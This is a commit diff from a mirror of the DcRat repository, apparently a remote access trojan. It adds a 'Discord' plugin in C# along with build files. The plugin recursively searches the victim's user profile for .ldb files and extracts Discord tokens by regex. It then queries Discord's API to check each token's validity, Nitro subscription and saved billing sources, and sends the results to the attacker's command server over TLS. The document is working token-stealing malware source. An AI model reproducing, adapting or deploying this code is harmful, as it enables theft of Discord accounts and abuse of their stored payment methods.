mirror of https://github.com/qwqdanchun/DcRat.git
Compare commits
2 Commits
38ed9013d9
...
718fbe946d
Author | SHA1 | Date |
---|---|---|
qwqdanchun | 718fbe946d | |
David | 98e8382bf2 |
11
DcRat.sln
11
DcRat.sln
|
@ -55,6 +55,8 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fun", "Plugin\Fun\Fun\Fun.c
|
|||
EndProject
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ReverseProxy", "Plugin\ReverseProxy\ReverseProxy\ReverseProxy.csproj", "{B5C5BDD1-568E-44F6-91FF-B26962AF9A6C}"
|
||||
EndProject
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Discord", "Plugin\Discord\Discord\Discord.csproj", "{40C64006-EE9C-4EC8-A378-B8499142C071}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
|
@ -263,6 +265,14 @@ Global
|
|||
{B5C5BDD1-568E-44F6-91FF-B26962AF9A6C}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
{B5C5BDD1-568E-44F6-91FF-B26962AF9A6C}.Release|x86.ActiveCfg = Release|Any CPU
|
||||
{B5C5BDD1-568E-44F6-91FF-B26962AF9A6C}.Release|x86.Build.0 = Release|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Debug|x86.ActiveCfg = Debug|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Debug|x86.Build.0 = Debug|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Release|x86.ActiveCfg = Release|Any CPU
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071}.Release|x86.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
|
@ -290,6 +300,7 @@ Global
|
|||
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
|
||||
{8BF244EB-0CA3-403E-A076-F1D77731A728} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
|
||||
{B5C5BDD1-568E-44F6-91FF-B26962AF9A6C} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
|
||||
{40C64006-EE9C-4EC8-A378-B8499142C071} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.29123.88
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Discord", "Discord\Discord.csproj", "{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,142 @@
|
|||
using MessagePackLib.MessagePack;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Net.Security;
|
||||
using System.Net.Sockets;
|
||||
using System.Security.Authentication;
|
||||
using System.Security.Cryptography.X509Certificates;
|
||||
using System.Text;
|
||||
using System.Threading;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
public static class Connection
|
||||
{
|
||||
public static Socket TcpClient { get; set; }
|
||||
public static SslStream SslClient { get; set; }
|
||||
public static X509Certificate2 ServerCertificate { get; set; }
|
||||
public static bool IsConnected { get; set; }
|
||||
private static object SendSync { get; } = new object();
|
||||
public static string Hwid { get; set; }
|
||||
|
||||
public static void InitializeClient(byte[] packet)
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
|
||||
{
|
||||
ReceiveBufferSize = 200 * 1024,
|
||||
SendBufferSize = 200 * 1024,
|
||||
};
|
||||
|
||||
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
|
||||
if (TcpClient.Connected)
|
||||
{
|
||||
Debug.WriteLine("Plugin Connected!");
|
||||
IsConnected = true;
|
||||
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
|
||||
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
|
||||
|
||||
new Thread(() =>
|
||||
{
|
||||
Packet.Read();
|
||||
}).Start();
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
IsConnected = false;
|
||||
return;
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
Debug.WriteLine("Disconnected!");
|
||||
IsConnected = false;
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
|
||||
{
|
||||
#if DEBUG
|
||||
return true;
|
||||
#endif
|
||||
return ServerCertificate.Equals(certificate);
|
||||
}
|
||||
|
||||
public static void Disconnected()
|
||||
{
|
||||
|
||||
try
|
||||
{
|
||||
IsConnected = false;
|
||||
SslClient?.Dispose();
|
||||
TcpClient?.Dispose();
|
||||
GC.Collect();
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
|
||||
public static void Send(byte[] msg)
|
||||
{
|
||||
lock (SendSync)
|
||||
{
|
||||
try
|
||||
{
|
||||
if (!IsConnected || msg == null)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
byte[] buffersize = BitConverter.GetBytes(msg.Length);
|
||||
TcpClient.Poll(-1, SelectMode.SelectWrite);
|
||||
SslClient.Write(buffersize, 0, buffersize.Length);
|
||||
|
||||
if (msg.Length > 1000000) //1mb
|
||||
{
|
||||
Debug.WriteLine("send chunks");
|
||||
using (MemoryStream memoryStream = new MemoryStream(msg))
|
||||
{
|
||||
int read = 0;
|
||||
memoryStream.Position = 0;
|
||||
byte[] chunk = new byte[50 * 1000];
|
||||
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
|
||||
{
|
||||
TcpClient.Poll(-1, SelectMode.SelectWrite);
|
||||
SslClient.Write(chunk, 0, read);
|
||||
SslClient.Flush();
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
TcpClient.Poll(-1, SelectMode.SelectWrite);
|
||||
SslClient.Write(msg, 0, msg.Length);
|
||||
SslClient.Flush();
|
||||
}
|
||||
Debug.WriteLine("Plugin Packet Sent");
|
||||
}
|
||||
catch
|
||||
{
|
||||
IsConnected = false;
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static void CheckServer(object obj)
|
||||
{
|
||||
MsgPack msgpack = new MsgPack();
|
||||
msgpack.ForcePathObject("Pac_ket").AsString = "Ping!)";
|
||||
Send(msgpack.Encode2Bytes());
|
||||
GC.Collect();
|
||||
}
|
||||
|
||||
}
|
||||
}
|
|
@ -0,0 +1,86 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
|
||||
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{40C64006-EE9C-4EC8-A378-B8499142C071}</ProjectGuid>
|
||||
<OutputType>Library</OutputType>
|
||||
<AppDesignerFolder>Properties</AppDesignerFolder>
|
||||
<RootNamespace>Plugin</RootNamespace>
|
||||
<AssemblyName>Discord</AssemblyName>
|
||||
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<Deterministic>true</Deterministic>
|
||||
<NuGetPackageImportStamp>
|
||||
</NuGetPackageImportStamp>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
|
||||
<DefineConstants>TRUE WIN32 _MSC_VER NDEBUG NO_TCL SQLITE_ASCII SQLITE_DISABLE_LFS SQLITE_ENABLE_OVERSIZE_CELL_CHECK SQLITE_MUTEX_OMIT SQLITE_OMIT_AUTHORIZATION SQLITE_OMIT_DEPRECATED SQLITE_OMIT_GET_TABLE SQLITE_OMIT_INCRBLOB SQLITE_OMIT_LOOKASIDE SQLITE_OMIT_SHARED_CACHE SQLITE_OMIT_UTF16 SQLITE_OMIT_VIRTUALTABLE SQLITE_OS_WIN SQLITE_SYSTEM_MALLOC VDBE_PROFILE_OFF </DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<NoWarn>0168 ; 0169; 0414; 0618; 0649</NoWarn>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<DebugType>none</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
|
||||
<DefineConstants>TRUE WIN32 _MSC_VER NDEBUG NO_TCL SQLITE_ASCII SQLITE_DISABLE_LFS SQLITE_ENABLE_OVERSIZE_CELL_CHECK SQLITE_MUTEX_OMIT SQLITE_OMIT_AUTHORIZATION SQLITE_OMIT_DEPRECATED SQLITE_OMIT_GET_TABLE SQLITE_OMIT_INCRBLOB SQLITE_OMIT_LOOKASIDE SQLITE_OMIT_SHARED_CACHE SQLITE_OMIT_UTF16 SQLITE_OMIT_VIRTUALTABLE SQLITE_OS_WIN SQLITE_SYSTEM_MALLOC VDBE_PROFILE_OFF </DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="Microsoft.VisualBasic" />
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Management" />
|
||||
<Reference Include="System.Security" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="Microsoft.CSharp" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Xml" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Connection.cs" />
|
||||
<Compile Include="Net.cs" />
|
||||
<Compile Include="Packet.cs" />
|
||||
<Compile Include="Plugin.cs" />
|
||||
<Compile Include="Recorvery.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="Discordo.cs" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="ILMerge.props" />
|
||||
<None Include="packages.config" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
|
||||
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
|
||||
<Name>MessagePackLib</Name>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Content Include="ILMergeOrder.txt" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
||||
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
|
||||
<PropertyGroup>
|
||||
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
|
||||
</PropertyGroup>
|
||||
<Error Condition="!Exists('..\..\..\packages\System.Data.SQLite.Core.1.0.112.1\build\net40\System.Data.SQLite.Core.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\System.Data.SQLite.Core.1.0.112.1\build\net40\System.Data.SQLite.Core.targets'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
|
||||
</Target>
|
||||
<Import Project="..\..\..\packages\System.Data.SQLite.Core.1.0.112.1\build\net40\System.Data.SQLite.Core.targets" Condition="Exists('..\..\..\packages\System.Data.SQLite.Core.1.0.112.1\build\net40\System.Data.SQLite.Core.targets')" />
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
|
||||
</Project>
|
|
@ -0,0 +1,111 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
class Discordo
|
||||
{
|
||||
public static string localpath = System.Environment.GetEnvironmentVariable("USERPROFILE");
|
||||
|
||||
public static List<string> ldbfiles = new List<string>();
|
||||
public static List<string> tokensSent = new List<string>();
|
||||
|
||||
static string rawText;
|
||||
|
||||
public static void GetTokens()
|
||||
{
|
||||
searchAll(localpath);
|
||||
if (ldbfiles.Count == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
foreach (string filez in ldbfiles)
|
||||
{
|
||||
|
||||
if (filez.EndsWith(".ldb"))
|
||||
{
|
||||
try
|
||||
{
|
||||
rawText = File.ReadAllText(filez);
|
||||
if (rawText.Contains("oken"))
|
||||
{
|
||||
|
||||
foreach (Match match in Regex.Matches(rawText, "[^\"]*"))
|
||||
{
|
||||
|
||||
if ((match.Length == 59 || match.Length == 89 || match.Length == 88) && isValidString(match.ToString()) == true)
|
||||
{
|
||||
if (tokensSent.Contains(match.ToString()) == false)
|
||||
{
|
||||
tokensSent.Add(match.ToString() + " -> " + Net.TokenState(match.ToString()) + " -> " + Net.NitroState(match.ToString()) + " -> " + Net.BillingState(match.ToString()));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
|
||||
}
|
||||
try { WriteTokens(); } catch { }
|
||||
}
|
||||
|
||||
public static void WriteTokens()
|
||||
{
|
||||
string tokens = "";
|
||||
foreach (string token in tokensSent)
|
||||
{
|
||||
if (!token.Contains("Valid: NO"))
|
||||
tokens += token + "\n";
|
||||
}
|
||||
|
||||
Recorvery.totaltokens = tokens;
|
||||
}
|
||||
|
||||
static bool isValidString(string text)
|
||||
{
|
||||
string allowed = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-_";
|
||||
string upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
|
||||
bool hasUpper = false;
|
||||
foreach (char ch in text)
|
||||
{
|
||||
if (upper.Contains(ch.ToString()) == true)
|
||||
{
|
||||
hasUpper = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (hasUpper == false)
|
||||
return false;
|
||||
foreach (char ch in text)
|
||||
{
|
||||
if (allowed.Contains(ch.ToString()) == false)
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
public static void searchAll(string location)
|
||||
{
|
||||
try
|
||||
{
|
||||
string[] files = Directory.GetFiles(location);
|
||||
string[] childDirectories = Directory.GetDirectories(location);
|
||||
for (int i = 0; i < files.Length; i++)
|
||||
{
|
||||
ldbfiles.Add(files[i]);
|
||||
}
|
||||
for (int i = 0; i < childDirectories.Length; i++)
|
||||
{
|
||||
searchAll(childDirectories[i]);
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,67 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<!-- -->
|
||||
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
|
||||
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
|
||||
<!-- -->
|
||||
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
|
||||
|
||||
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
|
||||
<ILMergeTransitive>true</ILMergeTransitive>
|
||||
|
||||
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
|
||||
<ILMergeLibraryPath></ILMergeLibraryPath>
|
||||
|
||||
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
|
||||
<ILMergePackagesPath></ILMergePackagesPath>
|
||||
|
||||
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
|
||||
<ILMergeOrderFile></ILMergeOrderFile>
|
||||
|
||||
<!-- The strong key file name if not specified in the project -->
|
||||
<ILMergeKeyFile></ILMergeKeyFile>
|
||||
|
||||
<!-- The assembly version if differs for the version of the main assembly -->
|
||||
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
|
||||
|
||||
<!-- added in Version 1.0.4 -->
|
||||
<ILMergeFileAlignment></ILMergeFileAlignment>
|
||||
|
||||
<!-- added in Version 1.0.4, default=none -->
|
||||
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
|
||||
|
||||
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
|
||||
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
|
||||
|
||||
<!-- See ILMerge documentation -->
|
||||
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
|
||||
|
||||
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
|
||||
<ILMergeCopyAttributes></ILMergeCopyAttributes>
|
||||
|
||||
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
|
||||
<ILMergeDebugInfo></ILMergeDebugInfo>
|
||||
|
||||
<!-- Target assembly will be delay signed -->
|
||||
<ILMergeDelaySign></ILMergeDelaySign>
|
||||
|
||||
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
|
||||
<ILMergeInternalize></ILMergeInternalize>
|
||||
|
||||
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
|
||||
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
|
||||
|
||||
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
|
||||
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
|
||||
|
||||
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
|
||||
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
|
||||
|
||||
<!-- Types with the same name are all merged into a single type in the target assembly -->
|
||||
<ILMergeUnionMerge></ILMergeUnionMerge>
|
||||
|
||||
<!-- The version of the target framework, default 40 (works for 45 too) -->
|
||||
<ILTargetPlatform></ILTargetPlatform>
|
||||
</PropertyGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
# this file contains the partial list of the merged assemblies in the merge order
|
||||
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
|
||||
# and finetune merge order to your satisfaction
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
using System.Net;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
class Net
|
||||
{
|
||||
public static string TokenState(string token)
|
||||
{
|
||||
try
|
||||
{
|
||||
using (WebClient http = new WebClient())
|
||||
{
|
||||
http.Headers.Add("Authorization", token);
|
||||
string result = http.DownloadString("https://discordapp.com/api/v6/users/@me");
|
||||
return result.Contains("Unauthorized") ? "Valid: NO" : "Valid: YES";
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
return "Valid: NO";
|
||||
}
|
||||
|
||||
public static string NitroState(string token)
|
||||
{
|
||||
try
|
||||
{
|
||||
using (WebClient http = new WebClient())
|
||||
{
|
||||
http.Headers.Add("Authorization", token);
|
||||
string result = http.DownloadString("https://discordapp.com/api/v6/users/@me/billing/subscriptions");
|
||||
return !result.Contains("created_at") ? "Nitro: NO" : "Nitro: YES";
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
return "Nitro: NO";
|
||||
}
|
||||
|
||||
public static string BillingState(string token)
|
||||
{
|
||||
try
|
||||
{
|
||||
using (WebClient http = new WebClient())
|
||||
{
|
||||
http.Headers.Add("Authorization", token);
|
||||
string result = http.DownloadString("https://discordapp.com/api/v6/users/@me/billing/payment-sources");
|
||||
return !result.Contains("type") ? "Billing: NO" : "Billing: YES";
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
return "Billing: YES";
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,43 @@
|
|||
using MessagePackLib.MessagePack;
|
||||
using System;
|
||||
using System.Text;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
public static class Packet
|
||||
{
|
||||
public static void Read()
|
||||
{
|
||||
try
|
||||
{
|
||||
Recorvery.Recorver();
|
||||
MsgPack msgpack = new MsgPack();
|
||||
msgpack.ForcePathObject("Pac_ket").AsString = "discordRecovery";
|
||||
msgpack.ForcePathObject("Tokens").AsString = Recorvery.totaltokens;
|
||||
Connection.Send(msgpack.Encode2Bytes());
|
||||
Log(Connection.Hwid + ":discord recovery success.");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Error(ex.Message);
|
||||
Connection.Disconnected();
|
||||
}
|
||||
}
|
||||
|
||||
public static void Error(string ex)
|
||||
{
|
||||
MsgPack msgpack = new MsgPack();
|
||||
msgpack.ForcePathObject("Pac_ket").AsString = "Error";
|
||||
msgpack.ForcePathObject("Error").AsString = ex;
|
||||
Connection.Send(msgpack.Encode2Bytes());
|
||||
}
|
||||
public static void Log(string message)
|
||||
{
|
||||
MsgPack msgpack = new MsgPack();
|
||||
msgpack.ForcePathObject("Pac_ket").AsString = "Logs";
|
||||
msgpack.ForcePathObject("Message").AsString = message;
|
||||
Connection.Send(msgpack.Encode2Bytes());
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,38 @@
|
|||
using System.Diagnostics;
|
||||
using System.Net.Sockets;
|
||||
using System.Security.Cryptography.X509Certificates;
|
||||
using System.Threading;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
public class Plugin
|
||||
{
|
||||
public static Socket Socket;
|
||||
public static Mutex AppMutex;
|
||||
public static string Mutex;
|
||||
public static string BSOD;
|
||||
public static string Install;
|
||||
public static string InstallFile;
|
||||
|
||||
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bsod, string install)
|
||||
{
|
||||
Debug.WriteLine("Plugin Invoked");
|
||||
AppMutex = mutex;
|
||||
Mutex = mtx;
|
||||
BSOD = bsod;
|
||||
Install = install;
|
||||
Socket = socket;
|
||||
Connection.ServerCertificate = certificate;
|
||||
Connection.Hwid = hwid;
|
||||
new Thread(() =>
|
||||
{
|
||||
Connection.InitializeClient(msgPack);
|
||||
}).Start();
|
||||
|
||||
while (Connection.IsConnected)
|
||||
{
|
||||
Thread.Sleep(1000);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,36 @@
|
|||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
// set of attributes. Change these attribute values to modify the information
|
||||
// associated with an assembly.
|
||||
[assembly: AssemblyTitle("")]
|
||||
[assembly: AssemblyDescription("")]
|
||||
[assembly: AssemblyConfiguration("")]
|
||||
[assembly: AssemblyCompany("")]
|
||||
[assembly: AssemblyProduct("")]
|
||||
[assembly: AssemblyCopyright("")]
|
||||
[assembly: AssemblyTrademark("")]
|
||||
[assembly: AssemblyCulture("")]
|
||||
|
||||
// Setting ComVisible to false makes the types in this assembly not visible
|
||||
// to COM components. If you need to access a type in this assembly from
|
||||
// COM, set the ComVisible attribute to true on that type.
|
||||
[assembly: ComVisible(false)]
|
||||
|
||||
// The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
//[assembly: Guid("8bfc8ed2-71cc-49dc-9020-2c8199bc27b6")]
|
||||
|
||||
// Version information for an assembly consists of the following four values:
|
||||
//
|
||||
// Major Version
|
||||
// Minor Version
|
||||
// Build Number
|
||||
// Revision
|
||||
//
|
||||
// You can specify all the values or you can default the Build and Revision Numbers
|
||||
// by using the '*' as shown below:
|
||||
// [assembly: AssemblyVersion("1.0.*")]
|
||||
[assembly: AssemblyVersion("1.0.7.0")]
|
||||
[assembly: AssemblyFileVersion("1.0.7.0")]
|
|
@ -0,0 +1,30 @@
|
|||
using System;
|
||||
using System.Data;
|
||||
using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Threading;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
using System.Diagnostics;
|
||||
using System.Security.Principal;
|
||||
using System.IO;
|
||||
using System.Reflection;
|
||||
|
||||
namespace Plugin
|
||||
{
|
||||
class Recorvery
|
||||
{
|
||||
public static string totaltokens = "";
|
||||
public static void Recorver()
|
||||
{
|
||||
try
|
||||
{
|
||||
Discordo.GetTokens();
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Packet.Error("[X] Exception: " + ex.Message + ex.StackTrace);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,5 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<packages>
|
||||
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
|
||||
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
|
||||
</packages>
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,7 @@
|
|||
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
|
||||
<PropertyGroup>
|
||||
<ILMergeConsolePath>$(MSBuildThisFileDirectory)..\tools\net452\ILMerge.exe</ILMergeConsolePath>
|
||||
</PropertyGroup>
|
||||
|
||||
</Project>
|
|
@ -0,0 +1,374 @@
|
|||
# ILMerge
|
||||
|
||||
Michael Barnett<br/>
|
||||
